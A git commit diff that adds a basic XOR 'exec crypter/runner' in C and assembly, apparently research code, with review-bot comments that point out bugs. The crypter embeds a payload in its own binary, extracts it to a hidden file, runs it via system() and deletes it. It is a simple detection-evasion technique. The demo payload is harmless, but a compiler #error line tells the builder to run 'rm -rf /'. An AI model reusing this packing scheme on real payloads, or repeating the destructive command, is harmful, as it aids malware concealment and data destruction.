authorToni Uhlig <matzeton@googlemail.com>2019-01-15 17:29:13 +0100
committerToni Uhlig <matzeton@googlemail.com>2019-01-15 22:40:48 +0100
commit13409bcaf88c427db44a4a62ed9c9fecb0479251 (patch)
treece4c9632f307aa48c83ef42106e247627669b1d2
parent27472b6dbdc5cd24806c1b7d496a767f5aa2e6f0 (diff)
very basic exec crypter/runner
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
-rw-r--r--.gitignore4
-rw-r--r--Makefile29
-rw-r--r--exec_crypter.asm12
-rw-r--r--exec_crypter.c202
-rw-r--r--exec_crypter_x64.asm12
-rw-r--r--exec_payload.c6
6 files changed, 264 insertions, 1 deletions
diff --git a/.gitignore b/.gitignore
index 8f0077a..9a0e7b1 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,3 +8,7 @@ sc-test
sc-test_x64
funcjmp_simple_x86
funcjmp_ext_x86
+exec_crypter
+exec_crypter_x64
+exec_payload
+exec_payload_x64
diff --git a/Makefile b/Makefile
index aff3b9e..8eb68e2 100644
--- a/Makefile
+++ b/Makefile
@@ -1,20 +1,46 @@
CD := cd
MAKE := make
RM := rm
+AS := nasm
CC := gcc
STRIP := strip
LBITS := $(shell getconf LONG_BIT)
CFLAGS += -Wall -O0 -g
OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static
+ECFLAGS += -Wall -O2 -ggdb
X86_FLAGS = -m32 -mpreferred-stack-boundary=2
X64_FLAGS = -m64 -mpreferred-stack-boundary=4
SOURCES = $(wildcard *.c)
TARGETS = $(patsubst %.c,%,$(SOURCES))
-all: $(TARGETS) overflow_x64 overflow_tcp_x64 sc-test_x64 shellcode crypter
+ifeq ($(LBITS),64)
+all: $(TARGETS) exec_payload_x64 exec_crypter_x64 overflow_x64 overflow_tcp_x64 sc-test_x64 shellcode crypter
+else
+all: $(TARGETS) shellcode crypter
+endif
main: $(TARGETS)
+exec_payload: exec_payload.c
+ $(CC) $(ECFLAGS) -m32 -o $@ $<
+
+exec_payload_x64: exec_payload.c
+ $(CC) $(ECFLAGS) -m64 -o $@ $<
+
+exec_payload_bin.o: exec_payload
+ $(STRIP) -s $<
+ $(AS) -felf32 -o $@ exec_crypter.asm
+
+exec_crypter: exec_payload_bin.o
+ $(CC) $(ECFLAGS) -m32 -D_NOTASKID=1 -o $@ $< exec_crypter.c
+
+exec_payload_x64_bin.o: exec_payload_x64
+ $(STRIP) -s $<
+ $(AS) -felf64 -o $@ exec_crypter_x64.asm
+
+exec_crypter_x64: exec_payload_x64_bin.o
+ $(CC) $(ECFLAGS) -m64 -D_NOTASKID=1 -o $@ $< exec_crypter.c
+
debug:
$(MAKE) -C . CFLAGS="-g"
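Review bot: The `exec_payload_bin.o` rule names only `exec_payload` as a prerequisite, so a change to `exec_crypter.asm` (whose marker/key layout exec_crypter.c relies on) does not trigger a rebuild, and `$(STRIP) -s $<` rewrites that prerequisite in place on every build; `exec_payload_bin.o: exec_payload exec_crypter.asm` plus stripping into a copy rather than in place would fix both, and the same applies to the `_x64` pair. `exec_payload` and `exec_crypter` are also produced by the `$(wildcard *.c)`-derived `$(TARGETS)`, so the explicit recipes above shadow the implicit `%: %.c` rule for those names; a one-line comment saying so would save the next reader from wondering which build wins. `-D_NOTASKID=1` uses an identifier reserved for the implementation (leading underscore followed by an uppercase letter), which a plain `-DNOTASKID=1` would avoid.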
@@ -34,6 +60,7 @@ rebuild: clean all
clean:
$(RM) -f *.o
$(RM) -f $(TARGETS) $(patsubst %,%_x64,$(TARGETS))
+ $(RM) -f exec_payload_x64 exec_crypter_x64 overflow_x64 overflow_tcp_x64 sc-test_x64
$(MAKE) -C crypter clean
$(MAKE) -C shellcode clean
diff --git a/exec_crypter.asm b/exec_crypter.asm
new file mode 100644
index 0000000..717a6c7
--- /dev/null
+++ b/exec_crypter.asm
@@ -0,0 +1,12 @@
+bits 32
+section .rodata
+
+global _exec_payload_start
+global _exec_payload_end
+global _exec_payload_size
+
+db 0xde,0xad,0xc0,0xde ; marker
+dd 0x00000000,0x00000000,0x00000000,0x00000000 ; xor key
+_exec_payload_start: incbin "exec_payload"
+_exec_payload_end:
+_exec_payload_size: dd $ - _exec_payload_start
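Review bot: The 16-byte key slot that follows the `db 0xde,0xad,0xc0,0xde` marker is stored in clear in the same `.rodata` section as the payload it protects, so anyone holding the file can locate the marker and XOR the payload back; that should be stated at the key line so the scheme is not mistaken for confidentiality, e.g. `; xor key - stored in clear next to the payload; obfuscation only, not encryption`. The marker is also the only anchor exec_crypter.c searches for, and it takes the first match in the whole image, so a comment recording that the byte sequence must not occur earlier in the binary would help, though whether it can in practice is not shown here. This file and exec_crypter_x64.asm differ only in `bits` and the incbin path; a single source with an `%ifdef` on the bitness would keep the two from drifting.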
diff --git a/exec_crypter.c b/exec_crypter.c
new file mode 100644
index 0000000..2ce4580
--- /dev/null
+++ b/exec_crypter.c
@@ -0,0 +1,202 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h> /* close() */
+#include <stdint.h> /* uint* */
+#include <string.h> /* mem*() */
+#include <fcntl.h> /* open() */
+#include <sys/stat.h> /* fstat(), struct stat */
+#include <sys/sendfile.h> /* sendfile() */
+#include <sys/mman.h> /* mmap(), munmap() */
+#include <sys/time.h> /* gettimeofday() */
+#include <limits.h> /* LONG_MAX */
+#include <libgen.h> /* basename() */
+
+#define XOR_KEYLEN 4
+extern uint8_t _exec_payload_start[];
+extern uint8_t _exec_payload_end[];
+extern uint32_t _exec_payload_size;
+
+typedef struct MyExecHeader {
+ uint32_t marker;
+ uint32_t xorkey[XOR_KEYLEN];
+ uint8_t payload[0];
+} __attribute__((packed, gcc_struct)) MyExecHeader;
+
+static uint8_t *
+findMarker(uint8_t *buf, size_t siz) {
+ size_t i;
+
+ for (i = 3; i < siz; ++i) {
+ if (buf[i-3] == 0xde &&
+ buf[i-2] == 0xad &&
+ buf[i-1] == 0xc0 &&
+ buf[i+0] == 0xde)
+ {
+ return &buf[i-3];
+ }
+ }
+
+ return NULL;
+}
+
+static long int
+random_number(long int n)
+{
+ int seed;
+ struct timeval tm;
+
+ gettimeofday(&tm, NULL);
+ seed = tm.tv_sec + tm.tv_usec;
+ srandom(seed);
+ return (random() % n);
+}
+
+static void
+xor_genkey(MyExecHeader *my_ehdr)
+{
+ size_t i;
+ uint32_t rnd[XOR_KEYLEN];
+
+ for (i = 0; i < XOR_KEYLEN; ++i) {
+ rnd[i] = (uint32_t) random_number(LONG_MAX);
+ }
+ memcpy(my_ehdr->xorkey, rnd, sizeof my_ehdr->xorkey);
+}
+
+static void
+xor_crypt(MyExecHeader *my_ehdr)
+{
+ size_t i;
+ uint8_t xb;
+ uint8_t *key = (uint8_t *) &my_ehdr->xorkey[0];
+
+ for (i = 0; i < _exec_payload_size; i++) {
+ xb = key[i % sizeof my_ehdr->xorkey];
+ my_ehdr->payload[i] ^= xb;
+ }
+}
+
+static char *
+shexbuf(uint8_t *buf, size_t buflen, char *dest, size_t destlen)
+{
+ size_t i, j;
+ static const char hexal[] = "0123456789ABCDEF";
+ uint8_t halfByte;
+
+ for (i = 0, j = 0; i < buflen && j < destlen; ++i, j += 3) {
+ halfByte = buf[i] >> 4;
+ dest[j+0] = hexal[ halfByte % 16 ];
+ halfByte = buf[i] & 0x0F;
+ dest[j+1] = hexal[ halfByte % 16 ];
+ dest[j+2] = ' ';
+ }
+
+ dest[j+2] = 0;
+ return dest;
+}
+
+int main(int argc, char **argv) {
+ char new_path[BUFSIZ];
+ int arg0_fd, new_fd, exec_fd;
+ struct stat arg0_statbuf;
+ uint8_t *mmap_exec, *marker;
+ MyExecHeader *my_ehdr;
+ const uint8_t nullbuf[XOR_KEYLEN] = {0};
+ char temp[BUFSIZ] = {0};
+ char exec_path[BUFSIZ];
+ off_t exec_off;
+
+ if (argc < 1)
+ return 1;
+
+ printf("\n[example]\n"
+ "Start: %p\n"
+ "End..: %p\n"
+ "Size.: %u\n",
+ _exec_payload_start, _exec_payload_end,
+ _exec_payload_size);
+
+ snprintf(new_path, sizeof new_path, "./.%s", basename(argv[0]));
+ arg0_fd = open(argv[0], O_RDONLY, 0);
+ new_fd = open(new_path, O_RDWR | O_CREAT | O_EXCL,
+ S_IRWXU | S_IRWXG | S_IRWXO);
+
+ printf("\n[fd]\n"
+ "arg0.: %d\n"
+ "new..: %d\n",
+ arg0_fd, new_fd);
+
+ if (arg0_fd < 0 || new_fd < 0)
+ return 1;
+ if (fstat(arg0_fd, &arg0_statbuf))
+ return 1;
+ if (sendfile(new_fd, arg0_fd, NULL,
+ arg0_statbuf.st_size) != arg0_statbuf.st_size)
+ return 1;
+ close(arg0_fd);
+
+ mmap_exec = (uint8_t *) mmap(NULL, arg0_statbuf.st_size, PROT_READ | PROT_WRITE,
+ MAP_SHARED, new_fd, 0);
+ if (!mmap_exec)
+ return 1;
+
+ printf("\n[exec]\n"
+ "mmap.: %p\n"
+ "size.: %lu\n",
+ mmap_exec, arg0_statbuf.st_size);
+
+ marker = findMarker(mmap_exec, arg0_statbuf.st_size);
+ if (!marker)
+ return 1;
+
+ printf("mark.: %p\n", marker);
+
+ my_ehdr = (MyExecHeader *) marker;
+ if (!memcmp(my_ehdr->xorkey, nullbuf, XOR_KEYLEN)) {
+ xor_genkey(my_ehdr);
+ printf("\nEmpty XOR Key .. Generated: %s\n",
+ shexbuf((uint8_t *) my_ehdr->xorkey,
+ sizeof my_ehdr->xorkey,
+ temp, sizeof temp));
+ } else {
+ printf("\nXOR Key: %s\nDecrypt payload ..\n",
+ shexbuf((uint8_t *) my_ehdr->xorkey,
+ sizeof my_ehdr->xorkey,
+ temp, sizeof temp));
+ xor_crypt(my_ehdr);
+ memset(my_ehdr->xorkey, 0, sizeof my_ehdr->xorkey);
+
+ printf("\nExtracting payload size %u\n",
+ _exec_payload_size);
+ snprintf(exec_path, sizeof exec_path, "%s_", new_path);
+
+ exec_fd = open(exec_path, O_RDWR | O_CREAT,
+ S_IRWXU | S_IRWXG | S_IRWXO);
+ if (exec_fd < 0)
+ return 1;
+
+ exec_off = my_ehdr->payload - mmap_exec;
+ printf("Extracted %zd\n",
+ sendfile(exec_fd, new_fd, &exec_off, _exec_payload_size));
+
+ close(exec_fd);
+
+ printf("Exec and Remove %s\n", exec_path);
+ printf("Returned: 0x%X\n", system(exec_path));
+ unlink(exec_path);
+ }
+
+ xor_crypt(my_ehdr);
+
+ munmap(mmap_exec, arg0_statbuf.st_size);
+ close(new_fd);
+
+ rename(new_path, argv[0]);
+
+ return 0;
+}
+
+#ifndef _NOTASKID
+#error "Compiler error, type `rm -rf /` in your terminal to solve this issue."
+#endif
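Review bot: After the decrypt branch clears the key with `memset(my_ehdr->xorkey, 0, sizeof my_ehdr->xorkey)`, the unconditional `xor_crypt(my_ehdr)` before `munmap` XORs with an all-zero key, so the copy that is renamed over `argv[0]` carries the payload in clear with an empty key and the next run re-encrypts instead of executing; dropping that memset and calling `xor_genkey(my_ehdr)` at the end of the branch keeps the stored copy encrypted. The `if (!mmap_exec)` check never fires because mmap() reports failure as `MAP_FAILED`, not NULL. The extracted payload is created with `O_CREAT` but no `O_EXCL` and mode `S_IRWXU | S_IRWXG | S_IRWXO`, then run through `system()`, which passes a path derived from `argv[0]` to `/bin/sh -c`; in a shared directory another local user can pre-create or swap `./.name_` between the write and the execution, so open it with `O_EXCL` and `S_IRWXU` and prefer fork()/execv() with an explicit argv over system(). The `random_number()` key source reseeds `srandom()` from the wall clock on every call, which is not a usable key generator even for an XOR scheme; `getrandom()` or `/dev/urandom` is the usual replacement. The `#error` at the end that tells the builder to type `rm -rf /` should be a plain message naming the missing `-D_NOTASKID` define.
```c
    mmap_exec = (uint8_t *) mmap(NULL, arg0_statbuf.st_size, PROT_READ | PROT_WRITE,
                                 MAP_SHARED, new_fd, 0);
    if (mmap_exec == MAP_FAILED)
        return 1;
    /* … unchanged: marker search, empty-key branch, decrypt … */
        /* O_EXCL: never follow or reuse a file someone else placed here; owner-only mode */
        exec_fd = open(exec_path, O_RDWR | O_CREAT | O_EXCL, S_IRWXU);
        if (exec_fd < 0)
            return 1;
    /* … unchanged: sendfile, close, system(), unlink … */
        /* fresh key so the copy written back below is never left in clear */
        xor_genkey(my_ehdr);
    }

    xor_crypt(my_ehdr);
```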
diff --git a/exec_crypter_x64.asm b/exec_crypter_x64.asm
new file mode 100644
index 0000000..ce1cd29
--- /dev/null
+++ b/exec_crypter_x64.asm
@@ -0,0 +1,12 @@
+bits 64
+section .rodata
+
+global _exec_payload_start
+global _exec_payload_end
+global _exec_payload_size
+
+db 0xde,0xad,0xc0,0xde ; marker
+dd 0x00000000,0x00000000,0x00000000,0x00000000 ; xor key
+_exec_payload_start: incbin "exec_payload_x64"
+_exec_payload_end:
+_exec_payload_size: dd $ - _exec_payload_start
diff --git a/exec_payload.c b/exec_payload.c
new file mode 100644
index 0000000..3d57df1
--- /dev/null
+++ b/exec_payload.c
@@ -0,0 +1,6 @@
+#include <stdio.h>
+
+int main(void) {
+ printf("I could be a dangerous payload ..\n");
+ return 0x66;
+}
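Review bot: The `return 0x66` is observed by exec_crypter.c through the raw value of `system()`, which is a wait status rather than the exit code, so the runner prints it as `0x6600` unless it is decoded with `WEXITSTATUS()`; a comment at the return line, `/* exit code 0x66; exec_crypter prints the raw system() status, so expect 0x6600 there */`, would stop that from being read as a bug. Beyond that the payload is a fine placeholder for the runner.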